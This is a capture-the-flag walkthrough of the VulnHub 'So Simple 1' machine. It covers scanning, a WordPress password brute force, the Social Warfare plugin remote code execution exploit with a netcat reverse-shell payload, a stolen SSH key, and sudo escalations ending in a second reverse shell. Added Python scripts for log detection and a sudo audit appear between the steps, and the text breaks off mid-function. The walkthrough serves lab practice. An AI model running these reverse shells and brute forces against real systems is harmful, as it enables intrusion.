So Simple 1
Identify the target host's IP address
┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:2e:b4:a6 1 60 PCS Systemtechnik GmbH
192.168.56.171 08:00:27:2d:d7:e0 1 60 PCS Systemtechnik GmbH
Using Kali Linux's built-in Netdiscover tool, the target host's IP address is identified as 192.168.56.171.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.171 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 02:59 EST
Nmap scan report for bogon (192.168.56.171)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
| 256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_ 256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: So Simple
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:2D:D7:E0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
The target host has two open ports: 22 (SSH) and 80 (HTTP).
Get Access
Start information gathering and analysis from the HTTP service.
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ curl http://192.168.56.171
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>So Simple</title>
<body style="background-color:red;">
<img src="so-simple.png" alt="so simple" width="1900" height="790">
</body>
</head>
<!--- Hi, nothing obvious here at the bottom of the source-code, just look further :) --->
The page contains an image; download it locally and analyse it.
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wget http://192.168.56.171/so-simple.png
--2022-11-12 03:02:51-- http://192.168.56.171/so-simple.png
Connecting to 192.168.56.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 47258 (46K) [image/png]
Saving to: ‘so-simple.png’
so-simple.png 100%[================================================================================================================================>] 46.15K --.-KB/s in 0s
2022-11-12 03:02:51 (556 MB/s) - ‘so-simple.png’ saved [47258/47258]
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ ls
nmap_full_scan so-simple.png
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ steghide extract -sf so-simple.png
Enter passphrase:
steghide: the file format of the file "so-simple.png" is not supported.
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ stegseek so-simple.png /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "so-simple.png" is not supported.
Nothing useful was extracted (steghide does not support the PNG format), so the next step is to enumerate the target site's directories.
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ gobuster dir -u http://192.168.56.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.171
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/12 03:04:09 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.171/wordpress/]
/server-status (Status: 403) [Size: 279]
Progress: 218316 / 220561 (98.98%)===============================================================
2022/11/12 03:04:38 Finished
===============================================================
A /wordpress directory was found. Run wpscan against it to check for vulnerabilities and enumerate usernames.
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wpscan --url http://192.168.56.171/wordpress -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.171/wordpress/ [192.168.56.171]
[+] Started: Sat Nov 12 03:09:20 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.171/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.171/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.171/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.171/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.171/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.56.171/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6, Match: 'Version: 1.6'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simple-cart-solution
| Location: http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/
| Last Updated: 2022-04-17T20:50:00.000Z
| [!] The version is out of date, the latest version is 1.0.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 0.2.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/assets/dist/js/public.js?ver=0.2.0
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
[+] social-warfare
| Location: http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2021-07-20T16:09:00.000Z
| [!] The version is out of date, the latest version is 4.3.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.56.171/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.171/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] max
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 12 03:09:23 2022
[+] Requests Done: 59
[+] Cached Requests: 6
[+] Data Sent: 16.409 KB
[+] Data Received: 608.511 KB
[+] Memory used: 238.527 MB
[+] Elapsed time: 00:00:03
Two usernames were identified: admin and max. Try to crack their passwords, especially the administrator account.
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ wpscan --url http://192.168.56.171/wordpress -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.171/wordpress/ [192.168.56.171]
[+] Started: Sat Nov 12 03:09:42 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.171/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.171/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.171/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.171/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.171/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.56.171/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.3
| Style URL: http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.6 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.6, Match: 'Version: 1.6'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] simple-cart-solution
| Location: http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/
| Last Updated: 2022-04-17T20:50:00.000Z
| [!] The version is out of date, the latest version is 1.0.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 0.2.0 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/assets/dist/js/public.js?ver=0.2.0
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/simple-cart-solution/readme.txt
[+] social-warfare
| Location: http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/
| Last Updated: 2021-07-20T16:09:00.000Z
| [!] The version is out of date, the latest version is 4.3.0
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Comment (Passive Detection)
|
| Version: 3.5.0 (100% confidence)
| Found By: Comment (Passive Detection)
| - http://192.168.56.171/wordpress/, Match: 'Social Warfare v3.5.0'
| Confirmed By:
| Query Parameter (Passive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/css/style.min.css?ver=3.5.0
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/assets/js/script.min.js?ver=3.5.0
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.171/wordpress/wp-content/plugins/social-warfare/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.56.171/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] max
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - max / opensesame
^Cying admin / EMOPUNK Time: 00:15:50 < > (113924 / 28694744) 0.39% ETA: 66:16:20
[!] Valid Combinations Found:
| Username: max, Password: opensesame
[!] No WPScan API Token given, as a result vulnerability data has not been output. > (113925 / 28694744) 0.39% ETA: 66:16:35
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 12 03:25:37 2022
[+] Requests Done: 114083
[+] Cached Requests: 51
[+] Data Sent: 57.825 MB
[+] Data Received: 658.115 MB
[+] Memory used: 271.977 MB
[+] Elapsed time: 00:15:55
Scan Aborted: Canceled by User
Although max's password was cracked, admin's was not, so another attack vector has to be found.
wpscan reported the social-warfare plugin, which is fairly old; check whether this version has a known exploitable vulnerability:
This version has a remote code execution vulnerability:
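The wpscan password attack above sent over 114,000 requests to wp-login.php in about fifteen minutes, which is loud in the web server's access log. As an added detection example (not part of the original writeup), the following Python script parses Apache combined-format log lines, counts POSTs to the login endpoints per source IP in a sliding window, and marks a source whose burst ends in a 302 (WordPress redirects on a successful login and answers a failed one with 200) as a likely successful guess. The log lines are constructed samples; the `LOGIN_PATHS`, window and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" access-log line, e.g. (constructed):
# 192.168.56.137 - - [12/Nov/2022:03:09:42 -0500] "POST /wordpress/wp-login.php HTTP/1.1" 200 4523 "-" "WPScan v3.8.22"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints a WordPress password attack hits (assumed for the /wordpress install above).
LOGIN_PATHS = {"/wordpress/wp-login.php", "/wordpress/xmlrpc.php"}


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bursts(lines, window=timedelta(seconds=60), threshold=20):
    """Flag source IPs that POST to a login endpoint more than `threshold` times
    inside any sliding `window`. A 302 seen while the source is already over the
    threshold is recorded as a likely successful guess."""
    events = defaultdict(list)            # ip -> [(timestamp, status)]
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?", 1)[0] in LOGIN_PATHS:
            events[rec["ip"]].append((rec["ts"], rec["status"]))

    alerts = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        start, peak, success_after_burst = 0, 0, False
        for end, (t, status) in enumerate(evs):
            while t - evs[start][0] > window:   # slide the window start forward
                start += 1
            in_window = end - start + 1
            peak = max(peak, in_window)
            if status == 302 and in_window > threshold:
                success_after_burst = True
        if peak > threshold:
            alerts[ip] = {"total": len(evs), "peak_per_window": peak,
                          "likely_success": success_after_burst}
    return alerts


def sample_log():
    """Constructed sample, not a real capture: one host guessing once per second
    for 30 s and then receiving a 302, plus ordinary traffic from another host."""
    base = datetime(2022, 11, 12, 3, 9, 42, tzinfo=timezone(timedelta(hours=-5)))

    def line(ip, method, path, status, ua, offset):
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 4523 "-" "{ua}"'

    lines = [line("192.168.56.137", "POST", "/wordpress/wp-login.php", 200, "WPScan v3.8.22", i)
             for i in range(30)]
    lines.append(line("192.168.56.137", "POST", "/wordpress/wp-login.php", 302, "WPScan v3.8.22", 30))
    lines.append(line("192.168.56.1", "GET", "/wordpress/", 200, "Mozilla/5.0", 31))
    lines.append(line("192.168.56.1", "POST", "/wordpress/wp-login.php", 302, "Mozilla/5.0", 32))
    return lines


if __name__ == "__main__":
    for ip, info in detect_login_bursts(sample_log()).items():
        print(ip, info)
```

Point the script at a real access.log (one line per list element) to run it against production traffic; the single legitimate login from 192.168.56.1 in the sample is correctly left unflagged.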
https://www.exploit-db.com/exploits/46794
Download the exploit code to the local Kali Linux machine.
Following the steps it describes, a payload.txt has to be created on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ cat payload.txt
<pre>
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.137 5555 >/tmp/f');
</pre>
and, on Kali Linux, serve the payload and start listening:
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ python2 exploit.py --target http://192.168.56.171/wordpress/ --payload-uri http://192.168.56.137:8000/payload.txt
[>] Sending Payload to System!
Run exploit.py, and a shell comes back to Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.171] 35364
bash: cannot set terminal process group (780): Inappropriate ioctl for device
bash: no job control in this shell
www-data@so-simple:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@so-simple:/var/www/html/wordpress/wp-admin$
www-data@so-simple:/home/max$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@so-simple:/home/max$ cat personal.txt
cat personal.txt
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=
www-data@so-simple:/home/max$
personal.txt is base64-encoded; decode it:
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ echo "SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=" | base64 -d
Hahahahaha, it's not that easy !!!
www-data@so-simple:/home/max/.ssh$ ls -alh
ls -alh
total 20K
drwxr-xr-x 2 max max 4.0K Jul 14 2020 .
drwxr-xr-x 7 max max 4.0K Jul 15 2020 ..
-rw-r--r-- 1 max max 568 Jul 14 2020 authorized_keys
-rwxr-xr-x 1 root root 2.6K Jul 14 2020 id_rsa
-rw-r--r-- 1 root root 568 Jul 14 2020 id_rsa.pub
www-data@so-simple:/home/max/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
Copy max's private key to the local Kali Linux machine, then use it to log in to the target host.
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ vim max_id_rsa
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ chmod 400 max_id_rsa
┌──(kali㉿kali)-[~/Vulnhub/So_Simple1]
└─$ ssh -i max_id_rsa max@192.168.56.171
The authenticity of host '192.168.56.171 (192.168.56.171)' can't be established.
ED25519 key fingerprint is SHA256:+ejHZkFq2lUl66K6hxgfr5b2MoCZzYE8v3yBV3/XseI.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.171' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Nov 12 08:52:51 UTC 2022
System load: 0.0 Processes: 133
Usage of /: 57.6% of 8.79GB Users logged in: 0
Memory usage: 30% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for enp0s3: 192.168.56.171
* "If you've been waiting for the perfect Kubernetes dev solution for
macOS, the wait is over. Learn how to install Microk8s on macOS."
https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/
47 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Jul 15 19:18:39 2020 from 192.168.1.7
max@so-simple:~$ id
uid=1000(max) gid=1000(max) groups=1000(max),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
max@so-simple:~$ ls -alh
total 52K
drwxr-xr-x 7 max max 4.0K Jul 15 2020 .
drwxr-xr-x 4 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 max max 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 max max 3.8K Jul 12 2020 .bashrc
drwx------ 2 max max 4.0K Jul 12 2020 .cache
drwx------ 3 max max 4.0K Jul 12 2020 .gnupg
drwxrwxr-x 3 max max 4.0K Jul 12 2020 .local
-rw------- 1 max max 118 Jul 12 2020 .mysql_history
-rw-r--r-- 1 max max 807 Feb 25 2020 .profile
drwxr-xr-x 2 max max 4.0K Jul 14 2020 .ssh
-rw-r--r-- 1 max max 49 Jul 12 2020 personal.txt
drwxrwxr-x 3 max max 4.0K Jul 12 2020 this
-rwxr-x--- 1 max max 33 Jul 13 2020 user.txt
max@so-simple:~$ cat user.txt
073dafccfe902526cee753455ff1dbb0
That is the first flag.
Now find a way to get a shell as steven.
max@so-simple:~$ cat .mysql_history
show databases;
use wordpress;
show tables;
use wp_users;
select wp_users
;
select wp_users;
select * from wp_users
;
max@so-simple:~$ cd ..
max@so-simple:/home$ ls
max steven
max@so-simple:/home$ cd steven
max@so-simple:/home/steven$ ls -alh
total 28K
drwxr-xr-x 3 steven steven 4.0K Jul 15 2020 .
drwxr-xr-x 4 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 steven steven 220 Jul 12 2020 .bash_logout
-rw-r--r-- 1 steven steven 3.7K Jul 12 2020 .bashrc
drwxrwxr-x 3 steven steven 4.0K Jul 13 2020 .local
-rw-r--r-- 1 steven steven 807 Jul 12 2020 .profile
-rwxr-x--- 1 steven steven 33 Jul 13 2020 user2.txt
max@so-simple:/home/steven$ cat user2.txt
cat: user2.txt: Permission denied
max@so-simple:/home/steven$ sudo -l
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
max@so-simple:/home/steven$ sudo -u steven /usr/sbin/service
Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]
max@so-simple:/home/steven$ sudo -u steven /usr/sbin/service ../../bin/sh
$ id
uid=1001(steven) gid=1001(steven) groups=1001(steven)
$
Following the method from the GTFOBins site, the service command is used to get a shell as steven.
steven@so-simple:/$ cd /home
steven@so-simple:/home$ cd steven
steven@so-simple:/home/steven$ ls -alh
total 28K
drwxr-xr-x 3 steven steven 4.0K Jul 15 2020 .
drwxr-xr-x 4 root root 4.0K Jul 12 2020 ..
-rw-r--r-- 1 steven steven 220 Jul 12 2020 .bash_logout
-rw-r--r-- 1 steven steven 3.7K Jul 12 2020 .bashrc
drwxrwxr-x 3 steven steven 4.0K Jul 13 2020 .local
-rw-r--r-- 1 steven steven 807 Jul 12 2020 .profile
-rwxr-x--- 1 steven steven 33 Jul 13 2020 user2.txt
steven@so-simple:/home/steven$ cat user2.txt
b662b31b7d8cb9f5cdc9c2010337f9b8
steven@so-simple:/home/steven$
That gives the second flag.
Privilege escalation
steven@so-simple:/$ cd /opt
steven@so-simple:/opt$ ls
steven@so-simple:/opt$ mkdir tools
steven@so-simple:/opt$ touch server-health.sh
steven@so-simple:/opt$ cd tools
steven@so-simple:/opt/tools$ vi server-health.sh
steven@so-simple:/opt/tools$ cat server-health.sh
#!/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.137 6666 >/tmp/f
steven@so-simple:/opt/tools$ chmod +x server-health.sh
steven@so-simple:/opt/tools$ sudo -u root ./server-health.sh
In /opt there is no tools directory and no server-health.sh file; create them, then run the script via sudo to get a root shell.
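Both escalations above come from sudo rules: service as steven (a GTFOBins shell escape) and a root rule pointing at /opt/tools/server-health.sh, which did not exist and could be created because /opt was writable. As an added audit example (not part of the original writeup), this Python script parses `sudo -l` output and, for each allowed command, flags known shell-escape binaries, missing targets, non-root-writable targets, and non-root-writable ancestor directories. The rule text and the temporary directory layout are constructed; `SHELL_ESCAPE_BINARIES` is an assumed partial list.

```python
import os
import re
import stat
import tempfile

# Binaries that can spawn a shell when allowed via sudo (assumed partial list;
# the writeup uses the service entry from GTFOBins).
SHELL_ESCAPE_BINARIES = {"service", "vi", "vim", "less", "more", "find",
                         "awk", "env", "python3", "bash", "sh"}

# One rule line of `sudo -l` output, e.g. "    (steven) NOPASSWD: /usr/sbin/service"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Turn the rule lines of `sudo -l` output into dicts (arguments are dropped)."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(": ") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": m.group("runas").strip(),
                              "nopasswd": "NOPASSWD" in tags,
                              "command": cmd.split()[0]})
    return rules


def _writable_by_non_root(st):
    """True if the owner is not root or group/world write bits are set."""
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_command(path):
    """Return findings for one command path from a sudo rule."""
    if path == "ALL":
        return ["any command allowed"]
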